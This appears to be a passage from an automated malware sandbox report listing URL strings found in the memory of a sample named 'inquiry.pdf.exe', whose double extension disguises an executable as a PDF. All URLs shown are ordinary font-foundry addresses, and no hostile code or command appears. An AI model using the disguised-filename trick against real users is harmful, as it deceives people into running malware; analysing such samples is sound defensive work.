            Source: inquiry.pdf.exe, 00000000.00000003.268808715.000000000652D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268232591.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268609542.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268447326.000000000652B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html4j-
            Source: inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlI
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: inquiry.pdf.exe, 00000000.00000003.267507239.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267605251.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersZ
            Source: inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersl
            Source: inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comB.TTFd
            Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271546551.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271631731.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271758905.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comI.TTF6
            Source: inquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comR.TTF
            Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsF5
            Source: inquiry.pdf.exe, 00000000.00000003.298903445.000000000654F000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.306760136.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.298246614.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.312562087.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297641323.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297909896.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297186585.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.298549688.000000000654E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comav
            Source: inquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
            Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdv
            Source: inquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdva
            Source: inquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268869519.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
            Source: inquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268869519.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comony/O
            Source: inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297641323.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297186585.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comrz
            Source: inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comsief
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: inquiry.pdf.exe, 00000000.00000003.261532259.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261663692.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261323232.0000000006548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: inquiry.pdf.exe, 00000000.00000003.261291352.0000000006548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn&
            Source: inquiry.pdf.exe, 00000000.00000003.261470904.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261541124.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261568725.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261532259.0000000006548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: inquiry.pdf.exe, 00000000.00000003.261323232.0000000006548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn4j4
            Source: inquiry.pdf.exe, 00000000.00000003.261220547.0000000006521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnQ
            Source: inquiry.pdf.exe, 00000000.00000003.261348606.0000000006548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnT
            Source: inquiry.pdf.exe, 00000000.00000003.261348606.0000000006548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnt-b
            Source: inquiry.pdf.exe, 00000000.00000003.274291319.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: inquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265844488.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265956637.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/6
            Source: inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/O
            Source: inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y
            Source: inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
            Source: inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0=
            Source: inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0f
            Source: inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: inquiry.pdf.exe, 00000000.00000003.263345727.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/k-u
            Source: inquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263345727.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/nyg
            Source: inquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265844488.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265956637.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s-e
            Source: inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ueT
            Source: inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/v
            Source: inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/vad
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
